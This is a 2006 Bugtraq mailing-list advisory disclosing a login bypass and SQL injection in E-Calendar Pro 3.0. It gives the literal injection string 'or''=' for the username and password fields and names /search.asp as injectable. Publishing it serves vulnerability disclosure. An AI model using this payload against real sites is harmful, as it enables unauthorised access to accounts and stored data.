Bugtraq mailing list archives
E-Calendar Pro 3.0 [ login bypass & injection sql (post)]
From: saps.audit () gmail com
Date: 15 Nov 2006 17:05:48 -0000
vendor site:http://www.futuretec-soft.com/ product:E-Calendar Pro 3.0 bug:login bypass & injection sql post risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql post: in : /search.asp post your query into the search engine . laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit () gmail com
Current thread:
- E-Calendar Pro 3.0 [ login bypass & injection sql (post)] saps . audit (Nov 15)